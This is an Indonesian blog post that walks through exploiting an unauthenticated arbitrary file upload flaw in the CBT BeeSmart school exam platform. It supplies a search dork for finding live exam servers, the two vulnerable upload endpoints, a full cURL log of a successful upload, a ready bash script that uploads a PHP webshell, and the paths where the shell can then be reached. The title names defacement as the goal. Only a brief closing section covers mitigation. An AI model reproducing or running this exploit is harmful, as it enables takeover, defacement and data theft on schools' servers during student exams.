Loading...
Updated at 04 Jun 2025

Eksploitasi CBT Beesmart Unauthenticated AFU

Deface dan eksploitasi Unauthenticated Arbitrary File Upload pada CBT BeeSmart menggunakan cURL saja. Terdampak pada ver...

aryachan

Published on·05 Jan 2025

Eksploitasi CBT Beesmart Unauthenticated AFU

Eksploitasi CBT BeeSmart

Kali ini terdapat vulnerability pada BeeSmart yang memungkinkan penyerang mengupload file apapun tanpa adanya autentikasi yang baik terlebih dahulu. Hanya menggunakan satu cookie, produk ini bisa dieksploitasi dengan sangat mudah.

Deskripsi

Penjelasan singkat dalam metode ini.

Dork: intext:Selamat Datang. Siswa Peserta Ujian + Login

Kamu bisa menggunakan dork diatas pada mesin pencari saat musim ujian siswa tiba. dan di bawah adalah payload letak vulnerability yang bisa dieksekusi untuk mengupload webshell.

# payload 1
target.com/panel/pages/upload-banner.php

# payload 2
target.com/panel/pages/upload-admin.php

Eksploitasi

Kamu bisa mengirim request dengan mengupload file pada payload yang sudah dicatat, contoh request dan respon jika berhasil mengupload file:

* Host target.com:443 was resolved.
* IPv6: (none)
* IPv4: 103.30.180.77
*   Trying 103.30.180.77:443...
* Connected to target.com (103.30.180.77) port 443
* ALPN: curl offers h2,http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 / x25519 / RSASSA-PSS
* ALPN: server accepted http/1.1
* Server certificate:
*  subject: CN=target.com
*  start date: Dec 31 00:00:00 2023 GMT
*  expire date: Mar 30 23:59:59 2024 GMT
*  issuer: C=US; ST=TX; L=Houston; O=cPanel, Inc.; CN=cPanel, Inc. Certification Authority
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
*   Certificate level 0: Public key type RSA (2048/112 Bits/secBits), signed using sha256WithRSAEncryption
*   Certificate level 1: Public key type RSA (2048/112 Bits/secBits), signed using sha384WithRSAEncryption
*   Certificate level 2: Public key type RSA (4096/152 Bits/secBits), signed using sha384WithRSAEncryption
* using HTTP/1.x
> POST /panel/pages/upload-banner.php HTTP/1.1
> Host: target.com
> User-Agent: curl/8.6.0
> Accept: */*
> Cookie: beeuser
> Content-Length: 251
> Content-Type: multipart/form-data; boundary=------------------------5blwdcHuktN1AdwXiYM1Uj
> 
* We are completely uploaded and fine
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
< HTTP/1.1 200 OK
< Server: nginx
< Date: Sun, 25 Feb 2024 09:07:58 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Vary: Accept-Encoding,User-Agent
< 
success
* Leftovers after chunking: 11 bytes
* Connection #0 to host target.com left intact

Dari contoh diatas, bisa dilakukan dengan membuka terminal dan menggunakan cURL. Berikut adalah script eksploitasi untuk kedua payload.

#/usr/bin/bash

#exp.sh

#payload1
curl -F "uploadfile1=@$2" $1/panel/pages/upload-banner.php -v -H "Cookie: beeuser" -k

#payload2
curl -F "uploadfile2=@$2" $1/panel/pages/upload-admin.php -v -H "Cookie: beeuser" -k

Cara menggunakan, ketik contoh perintah berikut:

chmod +x exp.sh && ./exp.sh https://target.com/cbt/ /home/aryakun/Documents/shell.php

Jika eksploitasi berhasil, maka file akan tampak dan bisa diakses pada /images/shell.php untuk payload 1 atau /panel/pages/photo/shell.php untuk payload 2.

Kesimpulan

Vulnerability Arbitrary File Upload adalah kerentanan keamanan di mana penyerang dapat mengunggah dan mengeksekusi file berbahaya ke server yang rentan. Umumnya terjadi pada aplikasi web yang memungkinkan pengguna mengunggah file, seperti gambar, dokumen, atau video. Jika aplikasi tidak memvalidasi dengan benar jenis dan konten file yang diunggah, penyerang dapat memanipulasi proses unggah untuk mengirim file berbahaya, seperti skrip eksekusi atau malware.

Dampak dari kerentanan ini dapat sangat serius, termasuk pengambilalihan kontrol atas server, eksekusi kode berbahaya, atau pencurian data sensitif. Untuk mencegah kerentanan Arbitrary File Upload, penting untuk menerapkan kontrol yang ketat terhadap jenis file yang diizinkan untuk diunggah, memeriksa ekstensi file, membatasi ukuran file, dan menggunakan mekanisme otentikasi yang kuat. Selain itu, penyedia aplikasi web dan pengembang perlu secara teratur memeriksa dan memperbarui keamanan aplikasi mereka untuk mengidentifikasi dan mengatasi potensi kerentanan baru.

reff: https://ecchiexploit.blogspot.com/2023/12/beesmart-cbt-unauthenticated-arbitrary.html

aryachan

i am hacker

Follow me on